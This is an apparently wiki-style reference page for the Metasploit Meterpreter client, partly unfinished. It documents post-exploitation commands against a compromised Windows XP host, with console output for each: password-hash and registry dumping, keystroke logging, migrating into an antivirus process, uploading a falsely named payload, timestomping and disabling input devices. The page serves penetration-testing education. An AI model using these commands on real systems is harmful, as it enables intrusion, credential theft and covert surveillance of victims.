Metasploit/MeterpreterClient

Meterpreter > shell

Introduction

edit

TODO - meterpreter introduction.

Getting Started

edit

Commands

edit

Core Commands

edit

We can use ? or help to show a list of commands with brief descriptions.

background

edit

Using the background command places the current session into the background and brings us back to the Metasploit console without terminating the session. We can begin to interact with the session again by using the sessions Metasploit command.

meterpreter > background
msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Description  Tunnel                                       
  --  -----------  ------                                       
  1   Meterpreter  192.168.50.112:443 -> 192.168.50.100:1495  

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >

channel

edit

TODO Displays information about active channels

close

edit

TODO Closes a channel

exit

edit

Returns to the Meterpreter console and closes the active session.

meterpreter > exit

[*] Meterpreter session 1 closed.
msf exploit(handler) > sessions -l

Active sessions
===============

No active sessions.

help

edit

We can use ? or help to show a list of commands with brief descriptions.

interact

edit

TODO Interacts with a channel

We can start the Interactive Ruby Shell with the irb command, allowing us to use the Ruby scripting language to interact with the compromised system.

To view the API, we need to run the rdoc command from the Metasploit directory, which will create a doc/index.html file that we can open with a browser. View the Rex::Post::Meterpreter section of the API for the relevant section.

meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client

>> client.sys.config.sysinfo()
=> {"OS"=>"Windows XP (Build 2600, Service Pack 2).", "Computer"=>"TARGETLAPTOP"}

migrate

edit

Meterpreter initially runs inside the exploited process or as its own executable's process in some cases. If that process is stopped for any reason, the Meterpreter session will close, so it is good practice to migrate the session to more stable process such as Windows' explorer.exe.

The following example shows the use of a handful of commands in order to locate a process that the user will not close during his or her session. The commands are:

  1. ps - Show a list of running processes.
  2. getpid - Display the process Meterpreter is using, which shows an EXE payload meter-443.exe.
  3. migrate pid - Move Meterpreter to a new process ID number, where we request the McAfee agent.
  4. getpid - Display the new process Meterpreter is using, which we verify is the McAfee agent process.


meterpreter > ps

Process list
============

    PID   Name                      Path                                                              
    ---   ----                      ----                                                              
    220   MPFSrv.exe                C:\Program Files\McAfee\MPF\MPFSrv.exe                            
    292   RalinkRegistryWriter.exe  C:\Program Files\RALINK\Common\RalinkRegistryWriter.exe           
    484   WinVNC4.exe               C:\Program Files\RealVNC\VNC4\WinVNC4.exe                         
    492   smss.exe                  \SystemRoot\System32\smss.exe                                     
    592   winlogon.exe              \??\C:\WINDOWS\system32\winlogon.exe                              
    636   services.exe              C:\WINDOWS\system32\services.exe                                  
    648   lsass.exe                 C:\WINDOWS\system32\lsass.exe                                     
    804   svchost.exe               C:\WINDOWS\system32\svchost.exe                                   
    956   svchost.exe               C:\WINDOWS\System32\svchost.exe                                   
    1404  spoolsv.exe               C:\WINDOWS\system32\spoolsv.exe                                   
    1432  Explorer.EXE              C:\WINDOWS\Explorer.EXE                                           
    1536  mcagent.exe               C:\Program Files\McAfee.com\Agent\mcagent.exe                     
    1616  RaUI.exe                  C:\Program Files\RALINK\Common\RaUI.exe                           
    1692  meter-443.exe         C:\Documents and Settings\Administrator\Desktop\shared\meter-443.exe  
    1848  McSACore.exe              C:\Program Files\McAfee\SiteAdvisor\McSACore.exe                  
    1860  mcmscsvc.exe              C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe                               
    1884  mcnasvc.exe               c:\PROGRA~1\COMMON~1\mcafee\mna\mcnasvc.exe                       
    1996  mcproxy.exe               c:\PROGRA~1\COMMON~1\mcafee\mcproxy\mcproxy.exe                   
    3076  wuauclt.exe               C:\WINDOWS\system32\wuauclt.exe                                   
    3320  wpabaln.exe               C:\WINDOWS\system32\wpabaln.exe                                   
    3424  mcsysmon.exe              C:\PROGRA~1\McAfee\VIRUSS~1\mcsysmon.exe                          
    4032  mcshield.exe              C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe                          

meterpreter > getpid
Current pid: 1692
meterpreter > migrate 1536
[*] Migrating to 1536...
[*] Migration completed successfully.
meterpreter > ps

Process list
============

    PID   Name                      Path                                                     
    ---   ----                      ----                                                     
    220   MPFSrv.exe                C:\Program Files\McAfee\MPF\MPFSrv.exe                   
    292   RalinkRegistryWriter.exe  C:\Program Files\RALINK\Common\RalinkRegistryWriter.exe  
    484   WinVNC4.exe               C:\Program Files\RealVNC\VNC4\WinVNC4.exe                
    492   smss.exe                  \SystemRoot\System32\smss.exe                            
    592   winlogon.exe              \??\C:\WINDOWS\system32\winlogon.exe                     
    636   services.exe              C:\WINDOWS\system32\services.exe                         
    648   lsass.exe                 C:\WINDOWS\system32\lsass.exe                            
    744   taskmgr.exe               C:\WINDOWS\system32\taskmgr.exe                          
    804   svchost.exe               C:\WINDOWS\system32\svchost.exe                          
    956   svchost.exe               C:\WINDOWS\System32\svchost.exe                          
    1404  spoolsv.exe               C:\WINDOWS\system32\spoolsv.exe                          
    1432  Explorer.EXE              C:\WINDOWS\Explorer.EXE                                  
    1536  mcagent.exe               C:\Program Files\McAfee.com\Agent\mcagent.exe            
    1616  RaUI.exe                  C:\Program Files\RALINK\Common\RaUI.exe                  
    1848  McSACore.exe              C:\Program Files\McAfee\SiteAdvisor\McSACore.exe         
    1860  mcmscsvc.exe              C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe                      
    1884  mcnasvc.exe               c:\PROGRA~1\COMMON~1\mcafee\mna\mcnasvc.exe              
    1996  mcproxy.exe               c:\PROGRA~1\COMMON~1\mcafee\mcproxy\mcproxy.exe          
    3076  wuauclt.exe               C:\WINDOWS\system32\wuauclt.exe                          
    3320  wpabaln.exe               C:\WINDOWS\system32\wpabaln.exe                          
    3424  mcsysmon.exe              C:\PROGRA~1\McAfee\VIRUSS~1\mcsysmon.exe                 
    4032  mcshield.exe              C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe                 

meterpreter > getpid
Current pid: 1536

quit

edit

Returns to the Meterpreter console and closes the active session.

meterpreter > quit

[*] Meterpreter session 1 closed.
msf exploit(handler) > sessions -l

Active sessions
===============

No active sessions.

read

edit

TODO Reads data from a channel

We can execute a Meterpreter script using the run command. If no path is specified, Meterpreter will search for the script in the scripts/meterpreter/ directory.

In the following example we are running the scripts/meterpreter/scraper.rb script, which pulls some basic information from the target. The information is logged to the ~/.msf3/logs/scraper directory.

meterpreter > run scraper.rb
[*] New session on 192.168.50.100:1548...
[*] Gathering basic system information...
[*] Dumping password hashes...
[*] Obtaining the entire registry...
[*]  Exporting HKCU
[*]  Downloading HKCU (C:\DOCUME~1\Administrator\LOCALS~1\Temp\xHzyoaiW.reg)
[*]  Cleaning HKCU
[*]  Exporting HKLM
[*]  Downloading HKLM (C:\DOCUME~1\Administrator\LOCALS~1\Temp\JYCDjVMU.reg)
[*]  Cleaning HKLM
[*]  Exporting HKCC
[*]  Downloading HKCC (C:\DOCUME~1\Administrator\LOCALS~1\Temp\uEATxCej.reg)
[*]  Cleaning HKCC
[*]  Exporting HKCR
[*]  Downloading HKCR (C:\DOCUME~1\Administrator\LOCALS~1\Temp\guYOZCzT.reg)
[*]  Cleaning HKCR
[*]  Exporting HKU
[*]  Downloading HKU (C:\DOCUME~1\Administrator\LOCALS~1\Temp\ZNfDGqdB.reg)
[*]  Cleaning HKU
[*] Completed processing on 192.168.50.100:1548...

For additional commands and functionality we can load Meterpreter extensions with the use command.

In the following example, we would like to use the hashdump command to retrieve password hashes from the target. By using the use priv command we can load the extension that gives us the hashdump command. We can verify this by using ? to list our available commands.

meterpreter > use -l
stdapi
sniffer
incognito
priv
espiameterpreter > use priv
Loading extension priv...success.

meterpreter > ?

<snip>

Priv: Password database Commands
================================

    Command       Description                             
    -------       -----------                             
    hashdump      Dumps the contents of the SAM database  


Priv: Timestomp Commands
========================

    Command       Description                      
    -------       -----------                      
    timestomp     Manipulate file MACE attributes

write

edit

TODO Writes data to a channel

File System Commands

edit

The cat command displays the contents of a single file. As of the time of this writing, the command will throw an error when trying to read an emtpy file.

meterpreter > cat passwords.txt
harleydavidson
password
kidsbirthday

To change directory the cd command is used.

The command will accept both back and forward slashes somewhat interchangeably, though using a forward slash seems to work more frequently. "." and ".." are used to access the current and parent directory, respectively, and double-quotes can be used to access directories with spaces in the names.

meterpreter > pwd
C:\
meterpreter > cd /"Program Files"/"Internet Explorer"
meterpreter > pwd
C:\Program Files\Internet Explorer
meterpreter > cd ../../"documents and settings"/Administrator/Desktop/
C:\Documents and Settings\Administrator\Desktop

download

edit

When we need to retrieve a file from the target we use the download command, which transfers the specified file into our local working directory. In the event that we need to recursively download an entire directory, we use the download -r command.

meterpreter > download users.txt
[*] downloading: users.txt -> users.txt
[*] downloaded : users.txt -> users.txt

edit

edit

To edit a file using our default text editor we use the edit command. Behind the scenes, Meterpreter will download a copy of the file to a temp directory, then upload the new file when the edit is complete.

meterpreter > edit users.txt

getlwd

edit

We can show the current working directory on our local machine by using getlwd (get local working directory), or by using the alias lpwd (local print working directory).

meterpreter > getlwd
/home/myusername/Desktop/metasploit
meterpreter > lpwd
/home/myusername/Desktop/metasploit

getwd

edit

We can show the current working directory on the exploited machine by using getwd (get working directory), or by using the alias pwd (print working directory).

meterpreter > getwd
C:\Program Files\Internet Explorer
meterpreter > pwd
C:\Program Files\Internet Explorer

To change the local directory we use the lcd command.

The command only accepts arguments in the same way as your operating system's cd command, so refer to your system's documentation for specific instructions. The following example shows lcd on a Linux system.

meterpreter > lpwd
/home/myusername/Desktop/metasploit
meterpreter > lcd ../..
meterpreter > lpwd
/home/myusername
meterpreter > lcd /home/andrer/Desktop/metasploit
meterpreter > lpwd
/home/myusername/Desktop/metasploit

lpwd

edit

We can show the current working directory on our local machine by using lpwd (local print working directory), or by using the alias getlwd (get local working directory).

meterpreter > lpwd
/home/myusername/Desktop/metasploit
meterpreter > getlwd
/home/myusername/Desktop/metasploit

We can see both the current working directory and a detailed listing of files in that directory by using the ls command. File listings are given in a format similar to the GNU ls program.

meterpreter > ls

Listing: C:\Documents and Settings\Administrator\Desktop\shared
===============================================================

Mode              Size   Type  Last modified                   Name               
----              ----   ----  -------------                   ----               
40777/rwxrwxrwx   0      dir   Wed Dec 31 18:00:00 -0600 1969  .                  
40777/rwxrwxrwx   0      dir   Wed Dec 31 18:00:00 -0600 1969  ..                 
100777/rwxrwxrwx  14965  fil   Wed Dec 31 18:00:00 -0600 1969  meter-443.exe  
40777/rwxrwxrwx   0      dir   Wed Dec 31 18:00:00 -0600 1969  u3

mkdir

edit

We use mkdir to make a new directory on the target system.

meterpreter > mkdir antivirus-update
Creating directory: antivirus-update
meterpreter > ls

Listing: C:\Documents and Settings\Administrator\Desktop
================================================

Mode              Size     Type  Last modified                   Name               
----              ----     ----  -------------                   ----               
40777/rwxrwxrwx   0        dir   Wed Dec 31 18:00:00 -0600 1969  .                  
40777/rwxrwxrwx   0        dir   Wed Dec 31 18:00:00 -0600 1969  ..                 
40777/rwxrwxrwx   0        dir   Wed Dec 31 18:00:00 -0600 1969  antivirus-update   
40777/rwxrwxrwx   0        dir   Wed Dec 31 18:00:00 -0600 1969  shared             
40777/rwxrwxrwx   0        dir   Wed Dec 31 18:00:00 -0600 1969  working

We can show the current working directory on our local machine by using pwd ( print working directory), or by using the alias getwd (get working directory).

meterpreter > pwd
C:\Program Files\Internet Explorer
meterpreter > getwd
C:\Program Files\Internet Explorer

rmdir

edit

We can remove an empty directory with the rmdir command. The command will throw an error if the directory is not empty.

meterpreter > rmdir antivirus-update
Removing directory: antivirus-update

upload

edit

To send a file to the target system we use the upload command, using the -r switch to recursively upload directories and their contents. In the following example we are uploading a falsely named Meterpreter payload.

meterpreter > upload antivirus.exe
[*] uploading  : antivirus.exe -> antivirus.exe
[*] uploaded   : antivirus.exe -> antivirus.exe
meterpreter > ls

Listing: C:\Documents and Settings\Administrator\Desktop\antivirus-update
=================================================================

Mode              Size   Type  Last modified                   Name           
----              ----   ----  -------------                   ----           
40777/rwxrwxrwx   0      dir   Wed Dec 31 18:00:00 -0600 1969  .              
40777/rwxrwxrwx   0      dir   Wed Dec 31 18:00:00 -0600 1969  ..             
100777/rwxrwxrwx  10912  fil   Wed Dec 31 18:00:00 -0600 1969  antivirus.exe

Networking Commands

edit

ipconfig

edit

By using the ipconfig command, or internet protocol configuration, we can view a listing of all network interfaces on the target. Viewing the results for ipconfig is most useful for determining to which networks the target is directly connected.

For example, looking at the following we can see that the target is connected to the 192.168.50.0/24 network, with an internal address of 192.168.50.100.

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0


National Semiconductor DP83815-Based PCI Fast Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0b:cd:30:db:0a
IP Address  : 192.168.50.100
Netmask     : 255.255.255.0

portfwd

edit

Forward a local port to a remote service

route

edit

View and modify the routing table

System Commands

edit

execute

edit

Execute a command

To execute a command you need to use execute "-f" for file "cmd.exe" application

This will be executed in the background. To check this type ps

execute -f cmd.exe 54124---> process id

getpid

edit

Get the current process identifier

getuid

edit

Get the user that the server is running as

kill

edit

Terminate a process

The ps command lists the running processes, and is an important command for a couple reasons. First, it is a good idea for us to be aware of applications and services running on the target in order to have awareness of the system. Secondly, Meterpreter initially runs inside the exploited process or as its own executable's process in some cases. If that process is stopped for any reason, the Meterpreter session will close, so it is good practice to migrate the session to more stable process such as Windows' explorer.exe.

meterpreter > ps

Process list
============

    PID   Name                      Path                                                     
    ---   ----                      ----                                                     
    284   MPFSrv.exe                C:\Program Files\McAfee\MPF\MPFSrv.exe                   
    424   RalinkRegistryWriter.exe  C:\Program Files\RALINK\Common\RalinkRegistryWriter.exe  
    492   smss.exe                  \SystemRoot\System32\smss.exe                            
    592   winlogon.exe              \??\C:\WINDOWS\system32\winlogon.exe                     
    612   WinVNC4.exe               C:\Program Files\RealVNC\VNC4\WinVNC4.exe                
    636   services.exe              C:\WINDOWS\system32\services.exe                         
    648   lsass.exe                 C:\WINDOWS\system32\lsass.exe                            
    804   svchost.exe               C:\WINDOWS\system32\svchost.exe                          
    876   NOTEPAD.EXE               C:\WINDOWS\system32\NOTEPAD.EXE                          
    964   svchost.exe               C:\WINDOWS\System32\svchost.exe                          
    1348  spoolsv.exe               C:\WINDOWS\system32\spoolsv.exe                          
    1464  Explorer.EXE              C:\WINDOWS\Explorer.EXE                                  
    1540  mcagent.exe               C:\Program Files\McAfee.com\Agent\mcagent.exe            
    1612  RaUI.exe                  C:\Program Files\RALINK\Common\RaUI.exe                  
    1840  McSACore.exe              C:\Program Files\McAfee\SiteAdvisor\McSACore.exe         
    1852  mcmscsvc.exe              C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe                      
    1876  mcnasvc.exe               c:\PROGRA~1\COMMON~1\mcafee\mna\mcnasvc.exe              
    1928  mcproxy.exe               c:\PROGRA~1\COMMON~1\mcafee\mcproxy\mcproxy.exe          
    1952  mcshield.exe              C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe                 
    3028  wuauclt.exe               C:\WINDOWS\system32\wuauclt.exe                          
    3168  wpabaln.exe               C:\WINDOWS\system32\wpabaln.exe                          
    3240  mcsysmon.exe              C:\PROGRA~1\McAfee\VIRUSS~1\mcsysmon.exe

reboot

edit

By running the reboot command, we will restart the target system.

meterpreter > reboot
Rebooting...

Modify and interact with the remote registry

rev2self

edit

Calls RevertToSelf() on the remote machine

shutdown

edit

Using the shutdown command will shut off the target system.

meterpreter > shutdown
Shutting down...

sysinfo

edit

During the post-exploitation phase, one of the earliest commands that we should run is the sysinfo command. Running this command will give us the Computer Name and OS version, which often offers a clue to the purpose of the target system.

meterpreter > sysinfo
Computer: TARGETLAPTOP
OS      : Windows XP (Build 2600, Service Pack 2).

User Interface Commands

edit

enumdesktops

edit

TODO List all accessible desktops and window stations

idletime

edit

Using the idletime command will return the length of time that the target system's user has been idle.

 meterpreter > idletime
 User has been idle for: 51 secs

keyscan_dump

edit

We can capture the keyboard input of the target using the keyscan series of commands. The keyscan_start and keyscan_stop commands will begin and end recording keystrokes respectively, while the keyscan_dump command displays all recorded keystrokes on our client.

meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
This text is actually being typed into the target's keyboard.<Return> 
meterpreter > keyscan_stop
Stopping the keystroke sniffer...

keyscan_start

edit

We can capture the keyboard input of the target using the keyscan series of commands. The keyscan_start and keyscan_stop commands will begin and end recording keystrokes respectively, while the keyscan_dump command displays all recorded keystrokes on our client.

meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
This text is actually being typed into the target's keyboard.<Return> 
meterpreter > keyscan_stop
Stopping the keystroke sniffer...

keyscan_stop

edit

We can capture the keyboard input of the target using the keyscan series of commands. The keyscan_start and keyscan_stop commands will begin and end recording keystrokes respectively, while the keyscan_dump command displays all recorded keystrokes on our client.

meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
This text is actually being typed into the target's keyboard.<Return> 
meterpreter > keyscan_stop
Stopping the keystroke sniffer...

setdesktop

edit

TODO Move to a different workstation and desktop

uictl

edit

Using the uictl command we have the ability to disable keyboard and mouse input on the target.

meterpreter > uictl disable mouse
Disabling mouse...
meterpreter > uictl enable mouse
Enabling mouse...
meterpreter > uictl disable keyboard
Disabling keyboard...
meterpreter > uictl enable keyboard
Enabling keyboard...